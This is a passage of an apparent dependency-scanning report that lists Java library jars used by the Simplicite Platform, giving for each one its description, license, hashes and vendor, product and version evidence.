Evidence Type Source Name Value Confidence Vendor file name bson High Vendor jar package name bson Highest Vendor Manifest automatic-module-name org.mongodb.bson Medium Vendor Manifest bundle-symbolicname org.mongodb.bson Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid bson Highest Vendor pom artifactid bson Low Vendor pom developer name Various Medium Vendor pom developer org MongoDB Medium Vendor pom groupid org.mongodb Highest Vendor pom name BSON High Vendor pom url https://bsonspec.org Highest Product file name bson High Product jar package name bson Highest Product Manifest automatic-module-name org.mongodb.bson Medium Product Manifest Bundle-Name bson Medium Product Manifest bundle-symbolicname org.mongodb.bson Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid bson Highest Product pom developer name Various Low Product pom developer org MongoDB Low Product pom groupid org.mongodb Highest Product pom name BSON High Product pom url https://bsonspec.org Medium Version file version 3.11.0 High Version Manifest build-version 3.11.0 Medium Version Manifest Bundle-Version 3.11.0 High Version pom version 3.11.0 Highest
bzip2-0.9.1.jarDescription:
jbzip2 is a Java bzip2 compression/decompression library. It can be used as a replacement for the Apache CBZip2InputStream / CBZip2OutputStream classes. License:
MIT License (MIT): http://opensource.org/licenses/mit-license.php File Path: /var/simplicite/.m2/repository/org/itadaki/bzip2/0.9.1/bzip2-0.9.1.jar
MD5: ddd5eb3a035655cbbb536e9b86907a00
SHA1: 47ca95f71e3ccae756c4a24354d48069c58f475c
SHA256: 865a7a13dd33ef0388f675993adaf4c6f95632ba80d609d42e9d42e6343aae77
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name bzip2 High Vendor jar package name bzip2 Highest Vendor jar package name bzip2 Low Vendor jar package name itadaki Highest Vendor jar package name itadaki Low Vendor pom artifactid bzip2 Highest Vendor pom artifactid bzip2 Low Vendor pom groupid org.itadaki Highest Vendor pom name Itadaki jbzip2 High Vendor pom url https://code.google.com/p/jbzip2/ Highest Product file name bzip2 High Product jar package name bzip2 Highest Product jar package name bzip2 Low Product jar package name itadaki Highest Product pom artifactid bzip2 Highest Product pom groupid org.itadaki Highest Product pom name Itadaki jbzip2 High Product pom url https://code.google.com/p/jbzip2/ Medium Version file version 0.9.1 High Version pom version 0.9.1 Highest
c3p0-0.9.5.4.jarDescription:
a JDBC Connection pooling / Statement caching library License:
GNU Lesser General Public License, Version 2.1: http://www.gnu.org/licenses/lgpl-2.1.html
Eclipse Public License, Version 1.0: http://www.eclipse.org/org/documents/epl-v10.php File Path: /var/simplicite/.m2/repository/com/mchange/c3p0/0.9.5.4/c3p0-0.9.5.4.jar
MD5: 45fd4a89c9fd671a0d1dc97c0ec77abe
SHA1: a21a1d37ae0b59efce99671544f51c34ed1e8def
SHA256: 60cf2906cd6ad6771f514a3e848b74b3e3da99c1806f2a63c38e2dd8da5ef11f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name c3p0 High Vendor jar package name c3p0 Highest Vendor jar package name mchange Highest Vendor jar package name v2 Highest Vendor Manifest extension-name com.mchange.v2.c3p0 Medium Vendor Manifest Implementation-Vendor Machinery For Change, Inc. High Vendor Manifest Implementation-Vendor-Id com.mchange Medium Vendor Manifest specification-vendor Machinery For Change, Inc. Low Vendor pom artifactid c3p0 Highest Vendor pom artifactid c3p0 Low Vendor pom developer email swaldman@mchange.com Low Vendor pom developer id swaldman Medium Vendor pom developer name Steve Waldman Medium Vendor pom groupid com.mchange Highest Vendor pom name c3p0 High Vendor pom url swaldman/c3p0 Highest Product file name c3p0 High Product jar package name c3p0 Highest Product jar package name mchange Highest Product jar package name v2 Highest Product Manifest extension-name com.mchange.v2.c3p0 Medium Product pom artifactid c3p0 Highest Product pom developer email swaldman@mchange.com Low Product pom developer id swaldman Low Product pom developer name Steve Waldman Low Product pom groupid com.mchange Highest Product pom name c3p0 High Product pom url swaldman/c3p0 High Version file version 0.9.5.4 High Version Manifest Implementation-Version 0.9.5.4 High Version pom version 0.9.5.4 Highest
cdm-4.5.5.jarDescription:
The NetCDF-Java Library is a Java interface to NetCDF files,
as well as to many other types of scientific data formats.
File Path: /var/simplicite/.m2/repository/edu/ucar/cdm/4.5.5/cdm-4.5.5.jarMD5: 7770c86aabbd0ec5e12ed1f0600d5492SHA1: af1748a3d024069cb7fd3fc2591efe806c914589SHA256: 74ea183cda0f7aa06fae2f3cfa8c3c6c64d013ce8cb87bde4a06de6676eacfdbReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name cdm High Vendor jar package name cdm Highest Vendor jar package name thredds Highest Vendor jar package name ucar Highest Vendor jar package name unidata Highest Vendor Manifest built-on 20150306.1537 Low Vendor Manifest Implementation-Vendor UCAR/Unidata High Vendor Manifest Implementation-Vendor-Id edu.ucar Medium Vendor pom artifactid cdm Highest Vendor pom artifactid cdm Low Vendor pom groupid edu.ucar Highest Vendor pom name CDM core library High Vendor pom parent-artifactid thredds-parent Low Vendor pom url http://www.unidata.ucar.edu/software/netcdf-java/documentation.htm Highest Product file name cdm High Product jar package name cdm Highest Product jar package name thredds Highest Product jar package name ucar Highest Product Manifest built-on 20150306.1537 Low Product Manifest Implementation-Title CDM core library High Product pom artifactid cdm Highest Product pom groupid edu.ucar Highest Product pom name CDM core library High Product pom parent-artifactid thredds-parent Medium Product pom url http://www.unidata.ucar.edu/software/netcdf-java/documentation.htm Medium Version file version 4.5.5 High Version Manifest Implementation-Version 4.5.5 High Version pom version 4.5.5 Highest
checker-qual-2.11.0.jarDescription:
Checker Qual is the set of annotations (qualifiers) and supporting classes
used by the Checker Framework to type check Java source code. Please
see artifact:
org.checkerframework:checker
License:
The MIT License: http://opensource.org/licenses/MIT File Path: /var/simplicite/.m2/repository/org/checkerframework/checker-qual/2.11.0/checker-qual-2.11.0.jar
MD5: 33a7c3e20614e973a80aa284e3782156
SHA1: 7de2908ee759b650dcddfd9913698e472cbe7272
SHA256: 493ccb75b28a164c7dbe066bcfef0fd4091fdc1d384cef664ae9555ff397cd83
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name checker-qual High Vendor jar package name checker Highest Vendor jar package name checkerframework Highest Vendor jar package name framework Highest Vendor jar package name qual Highest Vendor Manifest automatic-module-name org.checkerframework.checker.qual Medium Vendor Manifest bundle-symbolicname checker-qual Medium Vendor Manifest implementation-url https://checkerframework.org Low Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid checker-qual Highest Vendor pom artifactid checker-qual Low Vendor pom developer email mernst@cs.washington.edu Low Vendor pom developer email smillst@cs.washington.edu Low Vendor pom developer email wdietl@uwaterloo.ca Low Vendor pom developer id mernst Medium Vendor pom developer id smillst Medium Vendor pom developer id wmdietl Medium Vendor pom developer name Michael Ernst Medium Vendor pom developer name Suzanne Millstein Medium Vendor pom developer name Werner M. Dietl Medium Vendor pom developer org University of Washington Medium Vendor pom developer org University of Washington PLSE Group Medium Vendor pom developer org University of Waterloo Medium Vendor pom developer org URL http://uwaterloo.ca/ Medium Vendor pom developer org URL https://www.cs.washington.edu/ Medium Vendor pom developer org URL https://www.cs.washington.edu/research/plse/ Medium Vendor pom groupid org.checkerframework Highest Vendor pom name Checker Qual High Vendor pom url https://checkerframework.org Highest Product file name checker-qual High Product jar package name checker Highest Product jar package name checkerframework Highest Product jar package name framework Highest Product jar package name qual Highest Product Manifest automatic-module-name org.checkerframework.checker.qual Medium Product Manifest Bundle-Name checker-qual Medium Product Manifest bundle-symbolicname checker-qual Medium Product Manifest implementation-url https://checkerframework.org Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid checker-qual Highest Product pom developer email mernst@cs.washington.edu Low Product pom developer email smillst@cs.washington.edu Low Product pom developer email wdietl@uwaterloo.ca Low Product pom developer id mernst Low Product pom developer id smillst Low Product pom developer id wmdietl Low Product pom developer name Michael Ernst Low Product pom developer name Suzanne Millstein Low Product pom developer name Werner M. Dietl Low Product pom developer org University of Washington Low Product pom developer org University of Washington PLSE Group Low Product pom developer org University of Waterloo Low Product pom developer org URL http://uwaterloo.ca/ Low Product pom developer org URL https://www.cs.washington.edu/ Low Product pom developer org URL https://www.cs.washington.edu/research/plse/ Low Product pom groupid org.checkerframework Highest Product pom name Checker Qual High Product pom url https://checkerframework.org Medium Version file version 2.11.0 High Version Manifest Bundle-Version 2.11.0 High Version Manifest Implementation-Version 2.11.0 High Version pom version 2.11.0 Highest
codemodel-2.3.2.jarDescription:
The core functionality of the CodeModel java source code generation library File Path: /var/simplicite/.m2/repository/org/glassfish/jaxb/codemodel/2.3.2/codemodel-2.3.2.jarMD5: 8651b4954656d27a3408ffc38f041060SHA1: 143b70e564189b3f71a2e7f02d6bb8c6b16b5632SHA256: 8a89a76dffb491a3b2bcfcb6e8d9fb2e30ec0c36629a033f90c93182799af773Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name codemodel High Vendor jar package name codemodel Highest Vendor jar package name codemodel Low Vendor jar package name sun Highest Vendor jar package name sun Low Vendor jar (hint) package name oracle Highest Vendor jar (hint) package name oracle Low Vendor pom artifactid codemodel Highest Vendor pom artifactid codemodel Low Vendor pom groupid org.glassfish.jaxb Highest Vendor pom name Codemodel Core High Vendor pom parent-artifactid jaxb-codemodel-parent Low Vendor pom parent-groupid com.sun.xml.bind.mvn Medium Product file name codemodel High Product jar package name codemodel Highest Product jar package name codemodel Low Product jar package name sun Highest Product pom artifactid codemodel Highest Product pom groupid org.glassfish.jaxb Highest Product pom name Codemodel Core High Product pom parent-artifactid jaxb-codemodel-parent Medium Product pom parent-groupid com.sun.xml.bind.mvn Medium Version file version 2.3.2 High Version pom version 2.3.2 Highest
commonmark-0.13.0.jarDescription:
Core of commonmark-java (implementation of CommonMark for parsing markdown and rendering to HTML) File Path: /var/simplicite/.m2/repository/com/atlassian/commonmark/commonmark/0.13.0/commonmark-0.13.0.jarMD5: 535b94d32fa44874a37824586ab5906bSHA1: d233ad1436f35c7f88e3488ce6c1e65425c1a059SHA256: fd38aecef680649894ffd7b434e10081fc609e260c63e16c4323a3eaa2a9f096Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commonmark High Vendor jar package name commonmark Highest Vendor jar package name html Highest Vendor jar package name parsing Highest Vendor Manifest automatic-module-name org.commonmark Medium Vendor pom artifactid commonmark Highest Vendor pom artifactid commonmark Low Vendor pom groupid com.atlassian.commonmark Highest Vendor pom name commonmark-java core High Vendor pom parent-artifactid commonmark-parent Low Product file name commonmark High Product jar package name commonmark Highest Product jar package name html Highest Product jar package name parsing Highest Product Manifest automatic-module-name org.commonmark Medium Product pom artifactid commonmark Highest Product pom groupid com.atlassian.commonmark Highest Product pom name commonmark-java core High Product pom parent-artifactid commonmark-parent Medium Version file version 0.13.0 High Version pom version 0.13.0 Highest
commonmark-ext-autolink-0.13.0.jarDescription:
commonmark-java extension for turning plain URLs and email addresses into links File Path: /var/simplicite/.m2/repository/com/atlassian/commonmark/commonmark-ext-autolink/0.13.0/commonmark-ext-autolink-0.13.0.jarMD5: 3dc8ecec8ae20ad6211002d9d39ce47aSHA1: 06c68a2bea2d1643024ab2533350f3317e46a066SHA256: 610a086274e7ccc9611d99de91d7a4c8ee9a429ede65eb2afd7691882f837bd5Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commonmark-ext-autolink High Vendor jar package name autolink Highest Vendor jar package name commonmark Highest Vendor jar package name ext Highest Vendor Manifest automatic-module-name org.commonmark.ext.autolink Medium Vendor pom artifactid commonmark-ext-autolink Highest Vendor pom artifactid commonmark-ext-autolink Low Vendor pom groupid com.atlassian.commonmark Highest Vendor pom name commonmark-java extension for autolinking High Vendor pom parent-artifactid commonmark-parent Low Product file name commonmark-ext-autolink High Product jar package name autolink Highest Product jar package name commonmark Highest Product jar package name ext Highest Product Manifest automatic-module-name org.commonmark.ext.autolink Medium Product pom artifactid commonmark-ext-autolink Highest Product pom groupid com.atlassian.commonmark Highest Product pom name commonmark-java extension for autolinking High Product pom parent-artifactid commonmark-parent Medium Version file version 0.13.0 High Version pom version 0.13.0 Highest
commonmark-ext-gfm-strikethrough-0.13.0.jarDescription:
commonmark-java extension for GFM strikethrough using ~~ (GitHub Flavored Markdown) File Path: /var/simplicite/.m2/repository/com/atlassian/commonmark/commonmark-ext-gfm-strikethrough/0.13.0/commonmark-ext-gfm-strikethrough-0.13.0.jarMD5: 40a9c6854bf27aa785c979ada9ebac9cSHA1: 60c7582b118a9c47e859544df04da88cf1282eafSHA256: 5f3ad6d147eeab88f99b4f0f7be42969e1e876d4d3b851abd57a71b4af80ea6fReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commonmark-ext-gfm-strikethrough High Vendor jar package name commonmark Highest Vendor jar package name ext Highest Vendor jar package name gfm Highest Vendor jar package name strikethrough Highest Vendor Manifest automatic-module-name org.commonmark.ext.gfm.strikethrough Medium Vendor pom artifactid commonmark-ext-gfm-strikethrough Highest Vendor pom artifactid commonmark-ext-gfm-strikethrough Low Vendor pom groupid com.atlassian.commonmark Highest Vendor pom name commonmark-java extension for strikethrough High Vendor pom parent-artifactid commonmark-parent Low Product file name commonmark-ext-gfm-strikethrough High Product jar package name commonmark Highest Product jar package name ext Highest Product jar package name gfm Highest Product jar package name strikethrough Highest Product Manifest automatic-module-name org.commonmark.ext.gfm.strikethrough Medium Product pom artifactid commonmark-ext-gfm-strikethrough Highest Product pom groupid com.atlassian.commonmark Highest Product pom name commonmark-java extension for strikethrough High Product pom parent-artifactid commonmark-parent Medium Version file version 0.13.0 High Version pom version 0.13.0 Highest
commonmark-ext-gfm-tables-0.13.0.jarDescription:
commonmark-java extension for GFM tables using "|" pipes (GitHub Flavored Markdown) File Path: /var/simplicite/.m2/repository/com/atlassian/commonmark/commonmark-ext-gfm-tables/0.13.0/commonmark-ext-gfm-tables-0.13.0.jarMD5: 7e660c78c296f6ae4aa1382193e83d80SHA1: c3a5ba4217cacc7833c697e5081da42ae996655fSHA256: b4709a5149cd3cbfb9762216955ba0576abc88b52973b30dd6f697a7a6290d15Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commonmark-ext-gfm-tables High Vendor jar package name commonmark Highest Vendor jar package name ext Highest Vendor jar package name gfm Highest Vendor jar package name tables Highest Vendor Manifest automatic-module-name org.commonmark.ext.gfm.tables Medium Vendor pom artifactid commonmark-ext-gfm-tables Highest Vendor pom artifactid commonmark-ext-gfm-tables Low Vendor pom groupid com.atlassian.commonmark Highest Vendor pom name commonmark-java extension for tables High Vendor pom parent-artifactid commonmark-parent Low Product file name commonmark-ext-gfm-tables High Product jar package name commonmark Highest Product jar package name ext Highest Product jar package name gfm Highest Product jar package name tables Highest Product Manifest automatic-module-name org.commonmark.ext.gfm.tables Medium Product pom artifactid commonmark-ext-gfm-tables Highest Product pom groupid com.atlassian.commonmark Highest Product pom name commonmark-java extension for tables High Product pom parent-artifactid commonmark-parent Medium Version file version 0.13.0 High Version pom version 0.13.0 Highest
commonmark-ext-heading-anchor-0.13.0.jarDescription:
commonmark-java extension for adding unique id attributes to header tags File Path: /var/simplicite/.m2/repository/com/atlassian/commonmark/commonmark-ext-heading-anchor/0.13.0/commonmark-ext-heading-anchor-0.13.0.jarMD5: 6cad26a7747122569d835428b7486df3SHA1: 37d5856e790aeb5244fe931111d9ab7e13955d51SHA256: c1fbe40469f494c6f31f7870ea69f8db60d854b6c12bb0e2b615e08a55901c46Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commonmark-ext-heading-anchor High Vendor jar package name anchor Highest Vendor jar package name commonmark Highest Vendor jar package name ext Highest Vendor jar package name heading Highest Vendor Manifest automatic-module-name org.commonmark.ext.heading.anchor Medium Vendor pom artifactid commonmark-ext-heading-anchor Highest Vendor pom artifactid commonmark-ext-heading-anchor Low Vendor pom groupid com.atlassian.commonmark Highest Vendor pom name commonmark-java extension for adding id attributes to h tags High Vendor pom parent-artifactid commonmark-parent Low Product file name commonmark-ext-heading-anchor High Product jar package name anchor Highest Product jar package name commonmark Highest Product jar package name ext Highest Product jar package name heading Highest Product Manifest automatic-module-name org.commonmark.ext.heading.anchor Medium Product pom artifactid commonmark-ext-heading-anchor Highest Product pom groupid com.atlassian.commonmark Highest Product pom name commonmark-java extension for adding id attributes to h tags High Product pom parent-artifactid commonmark-parent Medium Version file version 0.13.0 High Version pom version 0.13.0 Highest
commonmark-ext-ins-0.13.0.jarDescription:
commonmark-java extension for using ++ File Path: /var/simplicite/.m2/repository/com/atlassian/commonmark/commonmark-ext-ins/0.13.0/commonmark-ext-ins-0.13.0.jarMD5: ded30f88bf404a24ba589e544eeaf378SHA1: c61ce9b71905e0a83871511c9eeec2051212036eSHA256: 5c65a7191a40d7cd3a49655e8534229b286b121169ff69ffbbace009ecd63965Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commonmark-ext-ins High Vendor jar package name commonmark Highest Vendor jar package name ext Highest Vendor jar package name ins Highest Vendor Manifest automatic-module-name org.commonmark.ext.ins Medium Vendor pom artifactid commonmark-ext-ins Highest Vendor pom artifactid commonmark-ext-ins Low Vendor pom groupid com.atlassian.commonmark Highest Vendor pom name commonmark-java extension for <ins> (underline) High Vendor pom parent-artifactid commonmark-parent Low Product file name commonmark-ext-ins High Product jar package name commonmark Highest Product jar package name ext Highest Product jar package name ins Highest Product Manifest automatic-module-name org.commonmark.ext.ins Medium Product pom artifactid commonmark-ext-ins Highest Product pom groupid com.atlassian.commonmark Highest Product pom name commonmark-java extension for <ins> (underline) High Product pom parent-artifactid commonmark-parent Medium Version file version 0.13.0 High Version pom version 0.13.0 Highest
commons-beanutils-1.9.4.jarDescription:
Apache Commons BeanUtils provides an easy-to-use but flexible wrapper around reflection and introspection. License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/commons-beanutils/commons-beanutils/1.9.4/commons-beanutils-1.9.4.jar
MD5: 07dc532ee316fe1f2f0323e9bd2f8df4
SHA1: d52b9abcd97f38c81342bb7e7ae1eee9b73cba51
SHA256: 7d938c81789028045c08c065e94be75fc280527620d5bd62b519d5838532368a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-beanutils High Vendor jar package name apache Highest Vendor jar package name beanutils Highest Vendor jar package name commons Highest Vendor Manifest bundle-docurl https://commons.apache.org/proper/commons-beanutils/ Low Vendor Manifest bundle-symbolicname org.apache.commons.commons-beanutils Medium Vendor Manifest implementation-build UNKNOWN_BRANCH@r??????; 2019-07-28 22:14:44+0000 Low Vendor Manifest implementation-url https://commons.apache.org/proper/commons-beanutils/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-beanutils Highest Vendor pom artifactid commons-beanutils Low Vendor pom developer email britter@apache.org Low Vendor pom developer email chtompki@apache.org Low Vendor pom developer email craigmcc@apache.org Low Vendor pom developer email dion@apache.org Low Vendor pom developer email epugh@apache.org Low Vendor pom developer email geirm@apache.org Low Vendor pom developer email ggregory@apache.org Low Vendor pom developer email jcarman@apache.org Low Vendor pom developer email jconlon@apache.org Low Vendor pom developer email jstrachan@apache.org Low Vendor pom developer email morgand@apache.org Low Vendor pom developer email mvdb@apache.org Low Vendor pom developer email niallp@apache.org Low Vendor pom developer email rdonkin@apache.org Low Vendor pom developer email rwaldhoff@apache.org Low Vendor pom developer email sanders@apache.org Low Vendor pom developer email scolebourne@apache.org Low Vendor pom developer email skitching@apache.org Low Vendor pom developer email stain@apache.org Low Vendor pom developer email tobrien@apache.org Low Vendor pom developer email yoavs@apache.org Low Vendor pom developer id britter Medium Vendor pom developer id chtompki Medium Vendor pom developer id craigmcc Medium Vendor pom developer id dion Medium Vendor pom developer id epugh Medium Vendor pom developer id geirm Medium Vendor pom developer id ggregory Medium Vendor pom developer id jcarman Medium Vendor pom developer id jconlon Medium Vendor pom developer id jstrachan Medium Vendor pom developer id morgand Medium Vendor pom developer id mvdb Medium Vendor pom developer id niallp Medium Vendor pom developer id rdonkin Medium Vendor pom developer id rwaldhoff Medium Vendor pom developer id sanders Medium Vendor pom developer id scolebourne Medium Vendor pom developer id skitching Medium Vendor pom developer id stain Medium Vendor pom developer id tobrien Medium Vendor pom developer id yoavs Medium Vendor pom developer name Benedikt Ritter Medium Vendor pom developer name Craig McClanahan Medium Vendor pom developer name David Eric Pugh Medium Vendor pom developer name Dion Gillard Medium Vendor pom developer name Gary Gregory Medium Vendor pom developer name Geir Magnusson Jr. Medium Vendor pom developer name James Carman Medium Vendor pom developer name James Strachan Medium Vendor pom developer name John E. Conlon Medium Vendor pom developer name Martin van den Bemt Medium Vendor pom developer name Morgan James Delagrange Medium Vendor pom developer name Niall Pemberton Medium Vendor pom developer name Rob Tompkins Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Rodney Waldhoff Medium Vendor pom developer name Scott Sanders Medium Vendor pom developer name Simon Kitching Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom developer name Stian Soiland-Reyes Medium Vendor pom developer name Tim O'Brien Medium Vendor pom developer name Yoav Shapira Medium Vendor pom developer org The Apache Software Foundation Medium Vendor pom groupid commons-beanutils Highest Vendor pom name Apache Commons BeanUtils High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url https://commons.apache.org/proper/commons-beanutils/ Highest Product file name commons-beanutils High Product jar package name apache Highest Product jar package name beanutils Highest Product jar package name commons Highest Product Manifest bundle-docurl https://commons.apache.org/proper/commons-beanutils/ Low Product Manifest Bundle-Name Apache Commons BeanUtils Medium Product Manifest bundle-symbolicname org.apache.commons.commons-beanutils Medium Product Manifest implementation-build UNKNOWN_BRANCH@r??????; 2019-07-28 22:14:44+0000 Low Product Manifest Implementation-Title Apache Commons BeanUtils High Product Manifest implementation-url https://commons.apache.org/proper/commons-beanutils/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Apache Commons BeanUtils Medium Product pom artifactid commons-beanutils Highest Product pom developer email britter@apache.org Low Product pom developer email chtompki@apache.org Low Product pom developer email craigmcc@apache.org Low Product pom developer email dion@apache.org Low Product pom developer email epugh@apache.org Low Product pom developer email geirm@apache.org Low Product pom developer email ggregory@apache.org Low Product pom developer email jcarman@apache.org Low Product pom developer email jconlon@apache.org Low Product pom developer email jstrachan@apache.org Low Product pom developer email morgand@apache.org Low Product pom developer email mvdb@apache.org Low Product pom developer email niallp@apache.org Low Product pom developer email rdonkin@apache.org Low Product pom developer email rwaldhoff@apache.org Low Product pom developer email sanders@apache.org Low Product pom developer email scolebourne@apache.org Low Product pom developer email skitching@apache.org Low Product pom developer email stain@apache.org Low Product pom developer email tobrien@apache.org Low Product pom developer email yoavs@apache.org Low Product pom developer id britter Low Product pom developer id chtompki Low Product pom developer id craigmcc Low Product pom developer id dion Low Product pom developer id epugh Low Product pom developer id geirm Low Product pom developer id ggregory Low Product pom developer id jcarman Low Product pom developer id jconlon Low Product pom developer id jstrachan Low Product pom developer id morgand Low Product pom developer id mvdb Low Product pom developer id niallp Low Product pom developer id rdonkin Low Product pom developer id rwaldhoff Low Product pom developer id sanders Low Product pom developer id scolebourne Low Product pom developer id skitching Low Product pom developer id stain Low Product pom developer id tobrien Low Product pom developer id yoavs Low Product pom developer name Benedikt Ritter Low Product pom developer name Craig McClanahan Low Product pom developer name David Eric Pugh Low Product pom developer name Dion Gillard Low Product pom developer name Gary Gregory Low Product pom developer name Geir Magnusson Jr. Low Product pom developer name James Carman Low Product pom developer name James Strachan Low Product pom developer name John E. Conlon Low Product pom developer name Martin van den Bemt Low Product pom developer name Morgan James Delagrange Low Product pom developer name Niall Pemberton Low Product pom developer name Rob Tompkins Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Rodney Waldhoff Low Product pom developer name Scott Sanders Low Product pom developer name Simon Kitching Low Product pom developer name Stephen Colebourne Low Product pom developer name Stian Soiland-Reyes Low Product pom developer name Tim O'Brien Low Product pom developer name Yoav Shapira Low Product pom developer org The Apache Software Foundation Low Product pom groupid commons-beanutils Highest Product pom name Apache Commons BeanUtils High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url https://commons.apache.org/proper/commons-beanutils/ Medium Version file version 1.9.4 High Version Manifest Bundle-Version 1.9.4 High Version Manifest Implementation-Version 1.9.4 High Version pom parent-version 1.9.4 Low Version pom version 1.9.4 Highest
commons-cli-1.4.jarDescription:
Apache Commons CLI provides a simple API for presenting, processing and validating a command line interface.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/commons-cli/commons-cli/1.4/commons-cli-1.4.jar
MD5: c966d7e03507c834d5b09b848560174e
SHA1: c51c00206bb913cd8612b24abd9fa98ae89719b1
SHA256: fd3c7c9545a9cdb2051d1f9155c4f76b1e4ac5a57304404a6eedb578ffba7328
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-cli High Vendor jar package name apache Highest Vendor jar package name cli Highest Vendor jar package name commons Highest Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-cli/ Low Vendor Manifest bundle-symbolicname org.apache.commons.cli Medium Vendor Manifest implementation-build tags/cli-1.4-RC1@r1786159; 2017-03-09 13:01:35+0000 Low Vendor Manifest implementation-url http://commons.apache.org/proper/commons-cli/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-cli Highest Vendor pom artifactid commons-cli Low Vendor pom developer email bob@werken.com Low Vendor pom developer email ebourg@apache.org Low Vendor pom developer email jbjk@mac.com Low Vendor pom developer email jstrachan@apache.org Low Vendor pom developer email roxspring@imapmail.org Low Vendor pom developer email tn@apache.org Low Vendor pom developer id bob Medium Vendor pom developer id ebourg Medium Vendor pom developer id jkeyes Medium Vendor pom developer id jstrachan Medium Vendor pom developer id roxspring Medium Vendor pom developer id tn Medium Vendor pom developer name Bob McWhirter Medium Vendor pom developer name Emmanuel Bourg Medium Vendor pom developer name James Strachan Medium Vendor pom developer name John Keyes Medium Vendor pom developer name Rob Oxspring Medium Vendor pom developer name Thomas Neidhart Medium Vendor pom developer org Ariane Software Medium Vendor pom developer org Indigo Stone Medium Vendor pom developer org integral Source Medium Vendor pom developer org SpiritSoft, Inc. Medium Vendor pom developer org Werken Medium Vendor pom groupid commons-cli Highest Vendor pom name Apache Commons CLI High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url http://commons.apache.org/proper/commons-cli/ Highest Product file name commons-cli High Product jar package name apache Highest Product jar package name cli Highest Product jar package name commons Highest Product Manifest bundle-docurl http://commons.apache.org/proper/commons-cli/ Low Product Manifest Bundle-Name Apache Commons CLI Medium Product Manifest bundle-symbolicname org.apache.commons.cli Medium Product Manifest implementation-build tags/cli-1.4-RC1@r1786159; 2017-03-09 13:01:35+0000 Low Product Manifest Implementation-Title Apache Commons CLI High Product Manifest implementation-url http://commons.apache.org/proper/commons-cli/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" Low Product Manifest specification-title Apache Commons CLI Medium Product pom artifactid commons-cli Highest Product pom developer email bob@werken.com Low Product pom developer email ebourg@apache.org Low Product pom developer email jbjk@mac.com Low Product pom developer email jstrachan@apache.org Low Product pom developer email roxspring@imapmail.org Low Product pom developer email tn@apache.org Low Product pom developer id bob Low Product pom developer id ebourg Low Product pom developer id jkeyes Low Product pom developer id jstrachan Low Product pom developer id roxspring Low Product pom developer id tn Low Product pom developer name Bob McWhirter Low Product pom developer name Emmanuel Bourg Low Product pom developer name James Strachan Low Product pom developer name John Keyes Low Product pom developer name Rob Oxspring Low Product pom developer name Thomas Neidhart Low Product pom developer org Ariane Software Low Product pom developer org Indigo Stone Low Product pom developer org integral Source Low Product pom developer org SpiritSoft, Inc. Low Product pom developer org Werken Low Product pom groupid commons-cli Highest Product pom name Apache Commons CLI High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url http://commons.apache.org/proper/commons-cli/ Medium Version file version 1.4 High Version Manifest Implementation-Version 1.4 High Version pom parent-version 1.4 Low Version pom version 1.4 Highest
commons-codec-1.13.jarDescription:
The Apache Commons Codec package contains simple encoder and decoders for
various formats such as Base64 and Hexadecimal. In addition to these
widely used encoders and decoders, the codec package also maintains a
collection of phonetic encoding utilities.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/commons-codec/commons-codec/1.13/commons-codec-1.13.jar
MD5: 5085f186156822fa3a02e55bcd5584a8
SHA1: 3f18e1aa31031d89db6f01ba05d501258ce69d2c
SHA256: 61f7a3079e92b9fdd605238d0295af5fd11ac411a0a0af48deace1f6c5ffa072
Referenced In Project/Scope: Simplicite Platform:compile
